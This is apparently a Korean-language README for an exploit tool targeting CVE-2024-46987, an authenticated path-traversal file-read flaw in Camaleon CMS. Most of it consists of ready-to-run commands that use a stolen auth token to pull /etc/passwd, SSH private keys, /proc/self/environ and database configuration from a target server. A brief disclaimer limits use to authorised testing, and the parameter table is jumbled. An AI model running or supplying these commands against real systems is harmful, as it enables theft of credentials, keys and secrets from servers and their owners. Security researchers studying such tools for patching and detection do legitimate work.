
CVE-2024-46987 - Camaleon CMS LFI Exploit
Camaleon CMS에 대한 인증된 로컬 파일 포함(LFI) 익스플로잇.
Camaleon CMS는 /admin/media/download_private_file 엔드포인트를 통해 인증된 LFI 공격에 취약합니다. file 매개변수가 적절히 검증되지 않아 경로 탐색(path traversal)을 통해 서버의 임의 파일을 읽을 수 있습니다.
pip install requests
# 파일을 터미널에 출력 (기본값)
python3 exploit.py -u http://example.com -f /etc/passwd -t "auth_token"
# 파일로 저장
python3 exploit.py -u http://example.com -f /etc/passwd -t "auth_token" -o passwd.txt
| Parameter |
|---|
# passwd 파일 읽기
python3 exploit.py -u https://example.com -f /etc/passwd -t "auth_token"
# SSH 키 읽기
python3 exploit.py -u https://example.com -f /home/user/.ssh/id_rsa -t "auth_token" -o id_rsa
# 환경 변수 읽기
python3 exploit.py -u https://example.com -f /proc/self/environ -t "auth_token"
# 애플리케이션 설정 읽기
python3 exploit.py -u https://example.com -f /var/www/html/config/database.yml -t "auth_token"
이 도구는 승인된 보안 테스트 및 교육 목적으로만 사용됩니다. 명시적 테스트 권한이 있는 시스템에만 사용하십시오.
| 설명 |
|---|
-u, --url | 대상 URL |
-f, --file | 읽을 파일 (예: /etc/passwd) |
-t, --token | auth_token 쿠키 값 |
-o, --output | 출력 파일명 (선택 사항, 설정하지 않으면 터미널에 출력) |